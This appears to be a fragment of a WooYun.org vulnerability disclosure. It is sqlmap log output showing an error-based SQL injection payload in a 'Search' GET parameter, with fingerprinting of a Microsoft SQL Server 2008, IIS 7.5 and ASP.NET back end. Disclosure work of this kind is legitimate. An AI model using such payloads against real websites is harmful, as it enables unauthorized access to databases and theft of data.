WooYun.org

[02:54:42] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Search (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Search=aaa%' AND 4897=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(
107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4897=4897) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(113))) AND '%'='
---
[02:54:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008